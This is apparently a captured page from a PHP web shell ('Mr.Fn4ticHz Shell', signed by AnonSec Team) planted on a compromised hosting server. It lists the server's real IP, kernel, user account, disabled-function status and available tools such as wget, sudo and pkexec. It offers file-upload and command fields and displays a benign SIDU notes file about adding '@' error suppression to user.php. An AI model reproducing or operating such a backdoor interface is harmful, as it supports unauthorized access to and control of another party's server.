Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.14.142.194
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/softaculous/sidu/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /var/softaculous/sidu//notes.txt
The following problem has been resolved in SIDU 3.7-----------------------------------


If you get errors when you click on 'User' tab in menu then 

Solutions (Recommended by Script Vendor):

1 - open file: user.php
========================
<?php
//0id 1tab 2user@host 3db 4table
include 'inc.page.php';
$SIDU['page']['nav']='defa';
uppe();
echo "<div class='web'>";
main($SIDU,$user,$acs,$acs2,$grant,$cmd);
echo '</div>';
down();

...
=========================

Above is the top part of user.php.

simply add "@" before uppe() and main(...) and down()

so it will look like the following:

========================
<?php
//0id 1tab 2user@host 3db 4table
include 'inc.page.php';
$SIDU['page']['nav']='defa';
@uppe();
echo "<div class='web'>";
@main($SIDU,$user,$acs,$acs2,$grant,$cmd);
echo '</div>';
@down();

...
=========================

2)We have changed the php requirement to 5.4 due to syntax error in version 6.0.

Anon7 - 2022
AnonSec Team